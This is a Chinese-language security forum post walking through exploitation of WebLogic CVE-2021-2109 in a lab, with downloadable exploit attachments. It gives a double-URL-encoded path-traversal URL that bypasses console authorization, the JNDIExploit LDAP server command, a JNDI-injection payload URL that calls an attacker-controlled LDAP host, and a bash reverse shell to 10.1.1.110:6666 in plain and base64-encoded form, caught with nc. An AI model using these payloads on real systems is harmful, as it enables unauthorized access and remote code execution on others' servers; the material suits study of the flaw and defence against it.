Weblogic未授权访问以及LDAP远程代码执行(CVE-2021-2109)

逍遥子   ·   发表于 2022-04-04 11:33:14   ·   漏洞文章

1.影响版本:
WebLogic Server10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0

  1. 实验环境:
    攻击机:kalilinux 10.1.1.10
    靶机: 10.1.1.109

3.weblogic未授权访问:
对目标地址的7001端口直接访问


构造绕过授权url: ip:7001/console/css/%252e%252e%252f/consolejndi.portal 其中%252e%252e%252f是../的二次url编码。成功访问到控制台,如果第一次未成功需要进行刷新。


此处存在weblogic的未授权访问,该版本受到影响。

4.远程代码执行
a.
启动需要攻击使用的ldap脚本 java -jar JNDIExploit.jar -i ip
下载地址:github的链接已经失效,我放在附件的位置。


配合WebLogic未授权漏洞进行代码执行:
/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://10.1.1;110:1389/Basic/WeblogicEcho;AdminServer%22)
注意:使用ldap的第三个分隔符使用的是;,不是.
构造一个传参为cmd,即为我们执行的命令。


b.
另外开启一个终端,运行漏洞的poc。设置响应的参数,看到成功执行,并且获取到了shell。

c.利用漏洞生成反弹shell。
将bash反弹命令bash -i >&/dev/tcp/10.1.1.110/6666 0>&1进行base64编码转换:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEuMTEwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
然后使用nc对本地的端口进行一个监听。


成功获取到shell

说明:大压缩文件中的poc发生了乱码,已经单独重新上传

用户名金币积分时间理由
woke 4.00 0 2022-04-08 14:02:14 一个受益终生的帖子~~
Track-劲夫 60.00 0 2022-04-07 19:07:34 一个受益终生的帖子~~

打赏我,让我更有动力~

附件列表

cve-2020-2109.zip   文件大小:26.335M (下载次数:13)

ldap_poc.7z   文件大小:0.001M (下载次数:8)

1 条回复   |  直到 2022-5-18 | 1231 次浏览

wuyafeiba
发表于 2022-4-24

附件中的poc.py运行有点问题啊

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.